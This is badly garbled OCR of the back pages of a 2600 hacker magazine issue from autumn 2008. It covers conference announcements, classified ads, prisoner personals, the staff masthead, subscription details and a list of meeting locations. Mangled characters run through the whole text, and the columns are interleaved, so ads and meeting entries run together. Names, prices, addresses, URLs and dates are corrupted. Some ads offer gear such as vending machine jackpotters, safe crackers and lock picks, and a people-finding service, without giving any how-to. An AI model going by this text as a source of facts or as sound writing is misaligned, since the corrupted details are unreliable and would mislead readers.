booki ng i nform,lt i ol l and prl.'-rt' gi 'trdt i on. Cal l ( GI S) 254 1 5 5 1 and
mcnti oll "PhredkNI C' for the speci al rate of $67/ni ght.
25C3 . NOTHI NG TO HI DE i s the 21th ChdOS Communi ca
ti on Congress to OC hel d n('c(mber 2 7t h to ] Ot h, 2 001 i n Berl i n,
Gpnn,lny at t he Rer l i ner Congrcs< C(nter at Al exanderpl .ltz. rhe
2 '\J conf('rpnc( program wi l l be di vi d(d i nto si x genpral cdtego
ri fs hacki ng, maki ng, sci ('nc(, soci ety, cul t ure, and communi ty.
LJ pd<tes wi l l lw posted at http://(V(' nts. ccc. d('/congress/200a/
HACKI NG AT RANDOM (HAR) i s the Olltdoor hacki ng event of
2009, to be held in August in l arounn The Nctherl ,l llds. Check
http: //hir2009. org frequentl y for updates or to gd i nvol ved.
THE NEXT HOPE. Summer 201 0, Hotel Penn<yl vani d, New York
Ci ty. http: //www.thf'll C'xthopc. org
For Sale
SECURI TY SYSTEM FOR SALE, under $ 1 00 dnd no monthl y
ices. I ,1m sel l i ng 'ccLi ri t y ,ystems to protEct your computEr or
personal SPeW, such .S a dormi tory or apartrent, etc. Thi s covert
;1 l arm <ystcm cal l s your cel l phorw on detect i on of i ntrusi on, then
, 1 1 l owi ng you to USf' your cel l phone to he.T the i ntruder". act i vi
t i ('< t hrough a <olJlld ;l nlpl i fi en mi crophone on t he uni t . Thi s al arm
system i s di <gll i <;cri as an ordi n;ry house phone dnd i s al so d
worki ng phol w1 ( Creal for offi cc's.) Bcst securi t y system money can
g(' t for undf'T $1 DO ,1 nd n() mont hl y fees. () rder now f()r $7' onl y .It
www. CNC- ni st r i bul i on. com/CNC
MAC SPYWARE- ant i -spyw;Jre for the Mac OS X, ddf'cb, i sol ate,,
<l nt! removes 'pywdre dnd over gOOO tracki ng cooki es. Thi rty day
fn'(' tri il l http://rn,l ( s( dl l . ,ec uTemdc. com/ Hel p u< promote
MacScill , rt'ceivl a frct' I Opy, and sWdg ma( <('c(ils('curf'mac. com
for ddi i k
J EAH. NET UNI X SHELLS & HOSTI NG: Wp <upport .o|0, b('( ,ll<('
Vl' rt',ld too! l EAl I cont i nu('< to he #l for bst, stahl e, and secure'
UNI X shel l dccounts wi t h hundreds of I Re vhost dorn(l i ns ,nrl
t1l (,('<S to o| | shel l programs dnd compi l er:. I EAH. NFT <l l so fpalurE"
rock-<ol i d UNI X web hosti ng dnd .0| rhldefs' setup feES (rE
;l l w;1YS w,liV('d. Oh, and eon' t forget our pri vate domJi n namp
regi strati on at FYNE. COM.
CRACKER FRI ENDLY GLASS TOBACCO PI PES, water pi pes,
chambpr pi l)f'S, and accessori es. Li qui dati on sel e! For t hos(' pul l i ng
al l ni ghtErs who n('('d hel p focusi ng. Free s hi ppi ng for orders
OVEr $30. Emai l kur l i e1 9B4S(yahoo. com for pics dnd questi ons.
Must bE 1 8!
TVB-GONE. Turn off TVs in publ i ( pl aces! Ai rports, rest,l Urants,
hars, anywhf're there's a TV. Now aVei l ebl e as an open source ki t,
b wel l as t ht, sll lwr-poplJ i ar ori gi nal kcych,i n. The ki t t urs off TVs
at 40 yards! And now, for professi onal <, t he TV-H-Cone Pro turns off
TVs up to 1 00 yards dway! .o0|re,lders gel 1 U'/ei scnunt on TV- B
Cone keychdi ns - use Coupon Code: 2 600. www. TVRCone. com
J ! NX HACKER CLOTHI NG/GEAR. Ti red of bei ng naked?
J I NX. com ha: (O+ T' s, sweat s hi rts, sti ckers, ami hats for those
r;lf{' t i mps th;t you ne('d to I pavl your house. We've got swag
for everyone, from the buddi ng nOObl et to the vi ntage geek.
parents, I mt lov('s, peopl t that owe them money, <1 nd j ust p! Ji n ol d
snoopi ng around. Vi <i t u< today at www.netdetecti ve. org. uk.
NETWORKI NG AND SECURITY PRODUCTS avai l abl e at
OV(ltionTechnol ogy. com. We're a suppl i er of Network Securi ty and
I nhrnet Pri vacy products. Our onl i ne SIOH' features VPN and fi re
wal l hdrdwdTe, wi rpl es! hardware, cabl e and DSL modems/routers,
IP tLtbb devi ces, Vol P products, parental control products, and
etl wret swi tchf' s. Wt pr i dE oursel ves on provi di ng t he hi ghest l evel
of techni cal experti se and customer sati sfacti on. Our commi tment
t o YOll . . . No surpri se',! Buy wi t h rOllfi dence! Securi ty and Pri vacy i s
our busi ness! Vi s i t us at http://www. Ovati onTechnol ogy.com/<tor(.
htm
REAL WORLD HACKI NG: I nt(re<ted i n rooftops, 'team t unnel s,
dne the l i ke? Redd the (I l l -new ccO //|Oa, d gui debook to t he
;t of urban expl ordt i on, from t he aut hor of /n/i/||a|iOn zi ne. Send
$20 postpii d i n tlw US \ Canada, or $2S overseas, to l| Box
1 J , Stat i on E, Toronto, ON M6H 4E 1 , Canada, or order onl i n( at
www. i nfi l trati on.org.
lkLCA LCWNA ON DVD! YCcl i n the maki ng but we
hope i t was worth the wai t. A douhl e nvn set that i ncl ude, the two
hour no(umentdrY, dn i n-depth i ntervi ew wi t h Kevi n Mi t ni ck, and
ncarl y t hrel. hours of extrd s(" pn(s, l ost foot;ge, anr mi scel l aneous
stuff. Pl us capti oni ng for 2 0 (that's ri ght, 20) l anguages, comm('n
t,lTy track, and a l ot of t hi ngs you' l l j ust have to fi nd for yoursel f!
The ent i rE two di sc <et can be han by sendi ng $:0 to Freedom
Downt i me DVD, PO Box 752, Mi ddl E 1 <l and, NY 1 1 9S. USA or
by orderi ng from our onl i ne stoTe .t http: //store. 2 600. com. ( VHS
copi es of t he fi l m sti l l aVli l abl l for $ 1 5. )
Help Wanted
COLLABORATE WI TH US. We' re desi gni ng ( new Oj<'Il
source gami ng <ystcm. I ncl udi ng open control J er hardware and
PC-conncctl'd consol e. Contri bute to systPIll desi gn, h,l(lw'l[(,
d(,s i gn, L1yout, protocol s, software, fi rmware, dO( Ull wntati on,
mechani cal dt's i gn, in more. httpllpowerxy. wi ki - si te. com
I NEED SPY RELATED ACTI VI TI ES, game<, ti ps, projects, experi
ments, etc. for ki ds aged b- 1 5 . Rf'al l y anyt hi ng h(vi ng to do wi th
spyi ng, ('<pi on;gc', ,md covert operati on:. Did you spy when you
WPr(, ki d? Tel l nl(' about your ;lCt i vi t i ('s .md stori ps. Pl f<sf cont,Kt
me at t h( fol l owi ng emai l dddrt.ss: chetdonll E. l l y 1 970(gmai l . com
RENEGADE BLACK SHEEP TECH ENTREPRENEUR i n proce" of
putti ng fl esh on the bom's of ,1n encrypted voice communi cati om
proj{'( t. Do you h,lVE experi ence i n t he deep detai l s of Vol P/SI P
protocol s, network traffic anal ysi s, hi l l i ng system constructi on, PtoP
routi ng, _lnd so on? I ntcrested i n worki ng wi th a top-end tpar to
bui l r , worl d-che1 ngi ng tool for regul dT fol k: around t he worl d t o
use i n t hEi r everyday l i ves? Contact me ,1t wr i nko(hus hmai l . com.
Wanted
LOOKI NC FOR 200 READERS who woul d l i kp to offer t hei r
servi ces for hi rc. Want to make money worki ng from hore or on
t he road, caJ i ( 740) 544-6563 extensi on 1 0.
WANTED. Vprified/veri fi abl e computer hackEL Wi l l pay $71 for
i ntprvi (w to be usen for future publ i cati on; ei ther OIHhe- record or
off-thp-record. Rp<ponsp2600 (at) Ydho(). com.
Services
So t,l kp a fivp mi nute break from surfi ng prOn dnd check out
http://www.J l NX. com. LJbcr-SeCfEt-Speci al -Mega Promo: Use BLACK OF HAT BLOG. [rel programs thdt may hpl p you achi (vc
"2600v2 Sno3" dnd get 1 0;;, off of your order.
flLJest i onabl P encb. Hacker I nfoTlTl dti on of i nterest i ncl udi ng
VENDI NG MACHI NE JACKPOTTERS. Go to (ormentary on .o|arti cl ('<. Vi si t http://hl ack-of-hat . bl ogspot. com.
www. hackershomfpag(,. com for Vendi ng & Sl ot Machi nt' l ackpot- Sampl (' programs recf' ntl y rel eased Crawl , Si teScan, and
ters, Safe Crackers, l ock Pi cks, Phone Devi ces & Controversi al DeepScan.
Hacki ng Publ i cati ons. BEEN ARRESTED FOR A COMPUTER OR TECHNOLOGY RElATED
NET DETECTIVE, Whether you'r( j u<t curi ous, tryi ng to l ocate or CRI ME? Hav{' an i dec, i nvent i on, Of busi ness you want to huy, <el l ,
f i nd out about peopl e f or personal or busi ncs< reasons, or you're protect, or mark<t ( Wi <h your attorney actual l y understood you when
l ooki ng for peopl e you've f,l l l (n out of touch wi t h, Net Detecti ve you speak? he Law Office of Mi ch(11 B. C; rccn, Esq. i s t he sol uti on
makes i t al l possi hl e! Net Detecti ve i s used worl dwi de by pri vate to your 2 1 st cPlltury J pgal probl ems. lOrnlf'f SysOp ,nd m(mbf'r of
i nvesti gators dnd detectives, as wel l as everyrlay pf'opl e who uS( i t many pri vate RRS's si nce 1 981 now ava i l abl e to di rp( t l y represent
to find I mt rel ati ves, old hi gh school and (rmy buddi es, ncadbcat you or bri dge the communi cati ons gap and assist your current l egal
la
[
C 22 %a
[
aZnC
counsel _ rxtr('m(' l y dd,l i l ed knovl edg(, rcg;l nl i ng cr i mi nal dnd ( - i vi l
l i 'l bi l i ty for COl 1l putf'r .:tI technol ogy r(' L lted ;( ti ots ' I l! USc.
I 02B, l O9f 1 010, 1 0.1 1 , 1 1,l l , 1 -1 42, I !J, l S I ] , 2 5 1 2, || 1,
f)MCA, I 996 rel ecum Act, c. ) , dOnl<l i n n,l mp di 'PlIt('S, i ntel
l ect ual property maHer' clIch ;1 < , cOfyri ght,, trcdemdrb, l i censes
,nd ;H qui s i ti ons, c' w(' l l d' gener,l l husi ness and corporate 1 ,1w.
Ow'r 1 1 ye,w; expcri f'IlCP ;1< i n- hou<(' l<'g,]1 ( ouns('1 to ( o rnpute!
consul t i ng husi rw's dS wel l c1 ,lIl over 20 Y{,dr hal kgroll nd in
cclfpuH'r, tpl<:'(- ormuni cali ons, ,l nd technol ogy mattprs. I)ubl i siwd
l aw revi pw arti cl es, ( olll ri butpo to n,l ti olil i l y puhl i shed buoks, d[l{l
'uhmi ttt'd bri Pls to the Uni ted States Supr('rw Court on I ntern('t and
tt'chnol ogy rel ,1ted i ,<up,. Admi t ted to the l. S. Suprenw Court, 2nd
Ci rcui t ((l UrL { ) f Appeal s, anrl ,1 1 1 New York Statp ( ourts dnd fdmi l i dr
wi th ot her j uri sdi cti ons as wei ! . M;my dttorneys wi l l take your lbt
wi thout any cOfsi der<t i on of our ndt ure and wi l l S('(' you merel y <IS
t1 suurce of fee' or worse, wi t h i l l -concei ved prej udi ces. My office
lInd('rst;mo< our cul t ure, is syrp,ltheti c to your si tuati on, anrl wi l l
tre,lI you wi t h t he respect and undcrstandi ng you deserve. No fee
for the i ni t i al Cnd confi dent i dl consul t.i on and, if for any rC(son Vt
cannot hel p you. we wi l l even try to fi nd someone el se who can .1t
no ch'l rge. So you have not hi ng to lose and perh<lps everyt hi ng to
gai n by cont<lC t i lg us first. Vi ,i ! us at: http://www. computorncy. com
or cai l 5 1 6-9WE-HELP ( I 1 6-99.1 -4.1 57) .
HACKER TOOLS TREASURE BOX! You get over 660 l i nks
to key fPSOllrn'<, pl us our proven methods for root i ng
out the hard-to-fi nd toul s, i nstant l y! I.(ts you bui l d your
own custom hlck(r (AHEM, I Jetwork securi ty) tool ki t
http://F(lTtressf),lt;lPf()tect i on. com/securi tybook
GET A RAISE AT WORK - BLOCK MORE SPAM. Spil mStopsl j ere
(vww. <p;mstopslwre. com) i s t he premi er sol uti on to hel p you
i mprove vour bus' opi ni on of you, or hf' l p you k(cf spam Lway fror
your own husi nc'<. I t wi l l hel p you bl ock over 99'X) uf sp<lm "out of
the box" Jml he' vi rt ual l y no f, l s( posi ti vps. I t requi res no t uni ng.
other t han h,wi ng your u<ers send any spim that doe managp to get
t hrough to a spCci al e-mai l add res,, -O i t too g<'ls bl ocked for a l l of
SpamS\opsHere's cl i ents. B(CdUSC of the rethodol ogy used, even
medi cal group' ,md l aw fi rms, t he two h,rdc<t types of organi zd
ti ons to "p,l m fi l ter. c;m gd grclt <ucces,. I 've been usi ng the servi ce
ryS(I ( lctwo ye.|sat ry empl oyer, and have person;l l l y h,ul two
fal se pos i ti ves in that ti mp, wi th 85'1., of t h( mai l my orgall i zdti on
rfceiV<s bei ng sp,l m. I n t he event thdt there i s a f;l se posi ti vc, your
users can fi nd out about i t t hf' r<el v('< anrl retri eve i t t ht' rsel vps.
The servi ce i s ,l l so c.pdbl e of bl ocki ng vi ruses, putt i ng another l i n('
of defense l)tw'pn ,) vi rus and your mii l servers. The servi ce evt'n
i mproves t'-rn di l rt' l i 'bi l i ty wi t h mul t i pl e-redundant servers it l oca
ti ons around t ht' U. S. , whi ch auto-store ;nd forwCrd your (-mai l i n
the event of .J h,udwire f;i l ure on your end. Best of al l , i t i s very
<1ffordabl e, and offers a 30-day free t r i al . Real i 7i ng that we'd be a
good market for them, I managed to negot i ate a 1 5 percent di scount
off the pri ce ofthc' servi ce for a l l .o00rp,lders. Si mpl y contact Scan at
secl1 @spamstopshere. com and menti on ?o00A.i_azint to get your
di scount.
HAVE A PROBLEM WI TH THE LAW! DOES YOUR LAWYER NOT
UNDERSTAND YOU? Have you been charged wi t h a computer
rel ated cri mp? I s someonl' thrcCteni ng to ,ue you for somet hi ng
t(chno! ogy rtl ated? Do you j ust need a l awyer t h;t understand I T
and the hdcker cul ture( I 've publ i shed and presented at HCPE and
[Cicon on the l aw |i ng technol ogy professi onal s and hackers a l i ke.
I ' r both a l awyer and an I T professi on<l l . Admi tted t o practi ce l aw
i n ppnnsyl viii a ;lI ld New jersey. hee consul tati on to .o00readers.
http://ruentll aw. com al ex(u) mucntzl aw.com ( 2 1 I) B06-4'HB
I NCARCERATED 200 MEMBER NEEDS COMMUNITY HELP to
bui l d content i n free cl assi fi ed ad and "l ocal husi n('<s di rectory"
in 50 count rips. John Lambros, the founder of Boycott Hra/i l , h(s
l aunched a H|cl a<si fi ed ad, want ad, anrl l oc,l hll <i ne<s di rectory
in 50 gl obal m,rkeh. The ri 'si on i s si mpl e: "free hel p to bi l l i ons of
peopl e lo( dt i ng j obs, housi ng, good, ;l nd <ervi n'', soci al acti vi t i es,
a gi rl fri end or boyfri pnd, communi t y i nformati on, and j ust about
anyt hi ng el se i n over one mi l l i on nei ghborhoods throughout the
worl d - al l for FRFF. HFl . P ME OLJT! SPREAD THE WORD! Pl pdse
vi si t www. NoPayCl asi fi eds. com and add some content. I t wi l l takp
a l l of fi ve or ten mi nutes. I .i nks to "No PilY CI ;w;i fi eds" dr dl so
greatl y apr)f(ci ;) kd.
PI MP YOUR WI RELESS ROUTER! http://packctprotector.org. Add
VPN, I PS, dnd web AV c;pabi l i ti (s to your wi rel e's router wi t h free,
open-source fi rnlw.l re from PackE'lProtector.org
ADVANCED TECHNI CAL SOLUTI ONS. #422 1 75 5 Robson
Street, VarH.ouver, B. C Clnada V6C . W7. Ph: ( 604) 928-0S II. El ec
troni c counternW(<llf('S - find out who i s eCTet l y vi deotapi ng you
or buggi ng your L or office. "Slate of the Art" detecti on cqui plnpnt
uti l i Lec!.
Announcements
fll !H HCCk i s the wl'ekl y Ol l {, hour hacker radi o show
prpst'nll. 'd W{'dn(',ddY ni ght' ;It 7: 00 prn |1 on VVBAI ''. .
FM in New York Ci tv. You Cdn d l so tun!' in over ||v | v| dt
www. 2 600. com/offl hehook. Anhl v{'s of ,1 1 1 , hows dati ng bd( | to
1 99B l he foull d <It t h( ' 2|0si t (' i n nl P ) formal ! Shmv, (I"om
1QaH 1007 ,He now .lvdi l dbl {' i ll [)VD-R hi gh fi dt> l i t y ,lUdi o for onl y
$ 1 0 a ye.lr or $ 1 50 for a l i feti me sub'cri pti on. St'nd t |vco r Il1um'y
ordf'r lO2|00, PO Box Z2, Mi ddl e bl ,l r1d, NY 1 I ' I USA \ ordl'r
t h rough our onl i ne 'tore at http://storc. 2(OO. uH n. Your tc{'db,H | on
t h", program i s dl way wel come at ot hCa1 2 600. C OIl .
THE HACKERS YOUTUBE. Vi dpo shar i ng ( nnuni ty for
upl oadi ng and watchi ng streami ng hacki ng, moddi ng, and
underground vi deos that the communi t y can fpl y on lO (]{' I i ver
qual i ty conlent to anyont wi l l i ng to lake I he t i nv |c | e.+ m.
http://www. veryangrytodd. com
THE HI GH WEI RDNESS PROJECT. We are cl SubCf'ni us wi ki
seeki ng submi ssi ons of strange, controversi al , subvcrsi w', dnd dbove
a l l Sl ackfu l sources of i nformdt i on. We do not fol l ow so-cal It'd
" neutr.l point of vi ew" - pl easp make your entries as il i dsed <IS you
want, ,S l ong as they're i ntert'st i ng! Speci al sedi ons dedi cdtf'd to
i nformati on warfare, softwarc, con"pi raci es, rel i gi on dnd skf'pt i
ci s r, and more. Chpck us out : www. mooemac. com .
PHONE PHUN. http://phoncphun. us. Bl og devo\t'd to i ntr're't i ng
phone nurbers. Share your fi nds!
Pprsonals
23 YEAR OLD SERVI NG 2 YEARS in Sheri dan, ( hegon for h'lC ki ng
i nto AT&T pl us many oth<'r Vol P provi ders. Fi r<t |O he charged wi t h
Vol P cri mes. FfaturC'd on mO|ica AO-|Han|tdwi t h K. Mi t ni ck.
Looki ng for ANYONE to wri te me. Check freeroherl.coll l for mort'
i nfo.
WHEN THE BULLET HI TS THE BONE. Change of ,lddw"". I f you
tri ed to send mai l Jd i t got rptunwd, that's why. Rowd and l onel y
phone nerd wi t h "ome t i me l eft i n our n,l t i on\ wondf'rfll l correc
t i ons sy'tem. Sti l l l ooki ng for pen PJl s to hel p nl{' P;l<S the t i me.
Wi l l respond to al l . I ntpn'sts i ncl ude but not l i mi ted to t(, l ecom,
computers, pol i t i cs, musi c, tats, urb;m expl orati on, cl f' { I roni c'. I ' m
a 2 ] yr s whi te mal f', bl ack hai r, green eyes. Some t a\ < o Mi ch,wl i 'rr
09496-029, FCI Oxford, PO Box 1 000, Oxford. WI f9S2.
COUNTER-I NTELLI GENCE, HACKI NG, comput{' r r('!;ltcd COl l nt ('r
mCcsun's. Former i nt l l i genc( offi cer i nterested i n new compu\tr
rel ated technol ogy. I n search of fri fnris, cont,l( t, ;l Ild worl dwi de
penpal s any age, race, or ori pnt;\ i on. I f pms i bl c, i ncl ud(' phol o wi t h
l etter. No nudi ty, pol aroi ds, or i nmate mai I . Sp.ni < h l Fngl i 'h OK.
| purchase mag;zi nps, books, unusual pi ctures wi t h my own flmds.
WM, 6' , 1 80, bl ondc, brown - wi l l respond to al l . I ntcf('st(d i n i nfo
all fi mnci al privacy, offshore trusts, hacki ng, ,md count('ri ntf' l l i
genu'. D. Coryel l , T-68 1 2 7, PO Box 8504, D.1 - 247up, Coa l i nga,
CA 9J1 1 0.
OFFLI NE OUTLAW IN TEXAS needs some hel p in dcvpl opi ng
programmi ng ski l l s. Interested i n PCr! anrl java'cri pt. Al so pri vacy
i n al l areas. Li brary her i s i nadroquate. Fpc! frec to drop those Ri l l
Me Later c<rds, d dd t o t h e mai l i ng l i sts, etc . . Th;lIl ks |O il l th(;('
who have hel ped me so much il H';Jly, you know who YOL l.
Wi l l i am Li ndl ey 822cB4, <T Terrel l , 1 100 EM o, Rosh,lf(ln, TX
7758J-8604
GAY PRI SONER SEEKS FRI ENDS to hEl p wi th book revi ew l ookup"
on Amdzon by keyword<. Cor Sci maj or, t hi rty to c. ltch up to the
real worl d before my reentry. I haW' my own funds to buy book'. I
onl y need revi ews. I ' m MUD/MMORPC savy in ("++, jdVd. Python,
PHP, MySQI ., Di redX. Ken Rofwrts j b0962, 4S0- 1 -2BM, PO Box ',
Avenal . CA 93204.
ONLY SUBSCRI BERS CAN ADVERTI SE I N 200' Don't ('v('n
t h i nk (bout tryi ng to take out dd u nl fss you subscri be! Al l ads
are fref dnd t her e i s no <mount of mon!y we wi l l iKCVt for a
non- subscr i ber ad. We hope t hat's cl ear. Of course, we reserve
t hl r i ght to pass j udgment on your ad and not pr i nt i t i f i t's ,1maL
i ngl y qupi d or has not hi ng <It al ! to do wi t h t he hdcker worl d.
We rkc no guarantpp a< to t he honesty. r i ghtcou<nfss, sdn ity,
(te. of the pEopl e advert i s i ng hfre. f:ontJct them at your pfr i l .
Al l s ubmi ssi ons (re for ONE I SSUF ONLY! I f you want to r un
your ad mnrf' t h,m once you must ff,uhmi l i t f'ic h t i mp. |)on' t
expect us to r un morc than ont ad for you i n a si ngl e i ssue ei l her.
I n c l ude you r address l abel /envpl opf' or O photocopy so wp know
you're a subscri ber. Sf'nd your ad to .o00 MMketp! ,P, PO Box
99, Mi ddk, bl and, NY 1 1 95 3 . You can al so (ma i l your dds to
s u b @2 600. com. He s ure to i ncl ude your s ub<( r i ber codi ng ( those
n u mbers on t he top of you r mai l i ng l abel ) for veri fi cat i on.
LC3d nCorWnCr 88uC: 1 1 lZb/U.
ulumn2d
la
[
C J
The 900 page col l ecti on of hi ghl i ghts from our
24 years of publ i shi ng i s now out , i ncl udi ng
al l sorts of new commentary t o go al ong wi th
the hi stori c mat eri al . Publ i shed by Wi l ey and
avai l abl e at bookstores everywhere, obtai nabl e
vi a amazon. com, bn. com, borders. com, and
count l ess other si tes t hroughout the worl d .
la
[
C

2%a
[
aZnC
"Ae //|e /n a sOC/e/yexqu/s//e/y deenden/ OnsC/enCeand /eChnO/Ogy /n wh/Ch
hard/y anyOne knOwsany/h/ngaOOu/sC/enCe and /eChnO/Ogy" - Car/Sagan
STAfF
Edi tor-I n-Chi ef
Emmanuel Gol dstei n
Associ ate Edi tor
Mi ke Castl eman
Layout and Desi gn
Skram
Cover
Dabu Ch' wal d
Offi ce Manager
Tampruf
Writers: Berni e S. , Bi l l sf, Bl and I nqui si tor,
Eri c Corl ey, Dragorn , Paul Estev, Mr. French,
gl utton, Javaman, Joe630, Graverose,
Ki ngpi n, Kn1 ghtl Ord, Kevi n Mi tni ck, The
Prophet, Redbi rd, Davi d Ruderman,
Screamer Chaoti x, Si l ent Swi tchman,
StankDawg, Mr. Upsetter
Webmaster: Jui ntz
Network Operati ons: css
Broadcast Coordi nators: Jui ntz, thai
2 (ISSN 0749-3851, USPS # 003- 1 76);
Autumn 2008, Volume 25 Issue 3, is
published quarterly by 2600 Enterprises Inc. ,
2 Flowerfield, St. James, NY 1 1 780.
Periodical postage rates paid at
St. James, NY and additional mailing
ofices.
POSTMASTER:
Send address changes to: 2600
PO. Box 752 Mi ddl e I sl and,
NY 1 1 953-0752.
SUBSCRI PTI ON CORRESPONDENCE:
2600 Subscri pti on Dept . , PO. Box 752,
Mi ddl e I sl and, NY 1 1 953-0752 USA
(subs@2600. com)
IRC Admi ns: beave, mangal a, koz, rOd3nt
Forum Admi n: Skram
I nspi rati onal Musi c: Cul ture, Kosmonaut,
Ed Tri ckett, Sui ci de Machi nes, Loui e
Ludwi g, I srael Kamakawi wo' ol e,
June Lodge
Shout Outs: the staff and attendees of
The Last HOPE, the Hotel Pennsyl vani a
peopl e, Steven Levy, Adam Savage, James
Powderl y, Ni ck Farr, Tanya, Bi g Frank,
Roadi e, Bi l l Pol l ock, Lazl ow, Ayo Harri ngton
YEARLY SUBSCRI PTI ONS:
U. S. and Canada $24 i ndi vi dual ,
$50 corporate ( U. S. Funds)
Overeas $34 i ndi vi dual , $65 corporate
Back i ssues avai l abl e for 1 984-2007 at
$25 per year, $34 per year overseas
I ndi vi dual i ssues avai l abl e from 1 988 on
at $6. 25 each, $8. 50 each overseas
LETTERS AND ARTI CLE
SUBMISSIONS:
2600 Edi tori al Dept . , PO. Box 99,
Mi ddl e I sl and, NY 1 1 953-0099 USA
(l etters@2600. com, arti cl es@2600. com)
2 Ofice Li ne: +1 631 751 2600
2 Fax Li ne: +1 631 474 2677
Copyri ght 2008; 2600 Enterpri ses I nc.
ulumn 2dl[C
GREECE Florida ARGENTI NA
Buenos Ai res: lhe "Cruzat Beer Athens: OUhi de the bookstore |j+- Gainesville: I n the back of the
I !OLlt'" her, S,mni entu 1 61 7 ((i rst
Iloor, PdS(O |J Pl az,) .
so! i ri ou on the corner of Pdti si on I J n i Vrsi ty of r! ori d,'s Rel It Uni on
,md Stourndri . 7 pm food court. 6 pm
AUSTRALI A
Melbourne: C:fei ne at R(Vaui t Bar,
1 6 Swa!l<ton \a l k, ned[ Mel bourne
Lenir.1 Shoppi ng Centre. 6: 30 pm
Sydney: The Crystal Pal ace, front
b.n/bistro, oppo'i te the bus sldli on
.nhl on George 51 at Cfntrdl St.lt l on.
6 pm
I RELAND Melbourne: House of joe Coffee
Dublin: At the phone booth" on House, I20 W New f-Iavpn Ave.
AUSTRIA
Graz: Clfe Hdi leS(el i c on
J,lkomi ni pi dtz.
BRAZI L
Bel o Horizonte: Peipgo\ Bar elt
Assufeng, near tht payphone. 6 pm
CANADA
Alberta
Calgary: EdU Cl d i re Market food
court by the bl and yel low wO1 1 .
6 pm
Manitoba
Winnipeg: 5t. Vital Shoppi ng Centre,
food court by HMV.
New Brunswicl
Moncton: Champl ai n Mall food
court, neM KFC 7 pm
Ontario
Guelph: Wi l l i am's Coffee Pub. 492
Edi nbourgh Rd 5. 7 pm
Ottawa: Worl d Exchange PI Ma, 1 1 1
Al bert St, second floor. 6: 30 pm
Toronto: Free Ti mes Cafe, Col legf
,md Spddi na.
Windsor: Uni versi ty otWi ndsor,
CAW Stuc!rnt Center commons area
by the l arge wi ndow. 7 pm
Quebec
Montreal: Bf' 1 1 Amphi theatre, 1 000,
rue de l a Caulheti ere
CHI NA
Hong Kong: Paci fi c Coffee i n
Festi val Wal k, Kowl oon rong_ 7 pm
CZECH REPUBLI C
Prague: legenda pub. pill
DENMARK
Aalborg: fast Fddi c's pool hal l
Aarhus: I n t he f ar COflwr of the DSB
cafe i n m stati on
Copenhagen: Bl asen
Wi ckl ow 51 besi de Tower Records
7 pm
ITALY
Milan: Pi aLd Loreto in front of
McDonal ds.
JAPAN
Tokyo: Li nux Cafe in Aki hdbdra
di stri cL. 6 pm
MEXI CO
Mexi co Ci ty: "Zocal o" SubwdY
Stati on ( Li ne 2 of the "METRO"
subway, tl1 hl ue one). At the
" Departamento del Di stri to feoeral "
exi t, ne<H t he pdyphones and the
candy shop, at the hegi nni ng of the
"Zocal o-Pi no Suarez" t unnel
NEW ZEALAND
Auckland: London Har, upsta i rs,
Wel l pl ey St, Auckl and Centra l .
5: 30 pm
Christchurch: java Cafe, corner of
Hi gh 51 dnd Monchester St. 6 pm
Wellington: l oad Cafp i n Cuba
Mal l . 6 pm
NORWAY
Oslo: Osl o Sentral Trai n Stati on
7 pm
Tromsoe: The upper fl oor at Bl aa
Rock C i e, Strandgata 1 4. 6 pm
Trondheim: Ri ch Cafe i n
NordregJte. 6 pm
PERU
Lima: Barbi l oni a ( ex Apu Bar ) , en
Al canfores 455, Mi raflorEs, at the
end of Tar dta St. 8 pm
SOUTH AFRI CA
Johannesburg (Sandlon City):
Sandton food court. (:30 pm
SWEDEN
Gothenburg: 2 nd (loor i n Burger
Ki ng at Avpnyn. 6 pm
Stockholm: Outsi de l ava.
SWITZERLAND
Lausanne: I n front of the Mac Do
beside the tr.i n stat i on. 7 pm
UNITED STATES
Alabama
Sonderborg: Cafe Druen. 7: 30 [m
Auburn: The student l oungc upstai rs
EGYPT
i n the Foy LJ ni on Bui l di ng. 7 pm
Port Said: At the foot of the Obel i sk
Huntsville: Stdl l l i l\ Sub Vi l l d {} }
( I- I Mi ,a l l ah) .
Jorr Lane.
ENGLAND
Tuscaloosa: Md-ari and M,l l l food
Brighton: At the
phone hoxes by the
court ned( the front entrancc
Sp'l l i fe Centn' (dum< thp rOdd from
Arizona
tlw PaI.1Cf' Pi prj . Payphone: (0 1 2 73)
Phoeni x: Un l i mi ted Coff!'p ( 741 E.
bOb674. 7 pm
Gl pnd,l l p Ave

i
_
ia
Exeter: At thp payphones, Bpdforcl
I rvine: Paner.) Bredd, 3988 Barranca
.:
r
t nd of the bus 'tati on
tarkw,lY 7 pil
opposi te Vi l ki nsol1s, Cmterbury
Los Angeles: Un i on Stati on, cornp!
(dO pill
of Mdcy &Al ameda. I nsi de mai n
London: Troudero Shoppi ng Ccnter
pntr,lnce by bdnk of phones.
( near Pi ccadi l l y Ci r( us), lowest
.
.- I l edd Pub on
Monterey: Mucky Duck. 479 Al va-
l ondon Rd. 7: 30 pm
ond Tbl p Pi ZLd at
Norwich: Border, elltr,mce to
1 2 7 K St
Chdppl fi pl d Mal l . 6 pm
San Diego: Regell!S Pi LLa, 41 50
Reading: Afro Bar, Mprch,
H
t
p
l d
( '
Regent, Park Row # 1 70.
off rri dr 5t. |:pm
San Francisco: 4 Embcrcadero Pl aza
FI NLAND
( i nsi ri e) . 5 : 30 pm
Hel si nki : Fpnni ,lkorttel i food court
San Jose: Outsi de the caf(' at thp
(VlIor i Kdtu 1 4) .
MLK Li hrary at 4t h and E S.1
FRANCE
rern'lndo. 6 pm
l. i l l e: Cr,l Ild- Pl dc( Wl au' Ch,Hl f'S elf'
Colorado
C,ul l p) i ll front of thp furd du Nord
Boulder: Wi ng .Oll' food court,
6 pm
Orlando: Fashi on Square Mal l Food
Courl hptween I lovan Courret and
Mam_ hu Wok. 6 pm
Tampa: Uni versi ty Mal l in the
back of the food court on the 2 nd
floor. 6 pm
Georgia
Atlanta: |enox Mal l food court.
7 pm
Idaho
Boise: BSU StudEtlt Uni on Bui l di ng,
upstai rs from the mai n entrcnce.
Payphone,: ( 208) 342- 9700, 9701
Pocatello: Col l ege Market, 604
5 8th St
I l l i nois
Chicago: Nei ghborhood Hoys dnd
Gi r l s Cl ub, 2S01 W Irvi ng PdTk
Rd. 7 pm
I ndiana
Evansville: Rarnps ,1d Noblp cafe et
624 5 Creel l Ri ver Rd.
Ft. Wayne: Gl enbrook Mal l food
court in front of Sbands. ( pm
Indianapolis: Mo'joe Coffee House,
222 W Mi chi gen SI.
Iowa
Ames: Memori al Uni on Bui l di ng
food court at the Iowa State
Universitv.
Kansas
Kansas City (Overland Prk): Oak
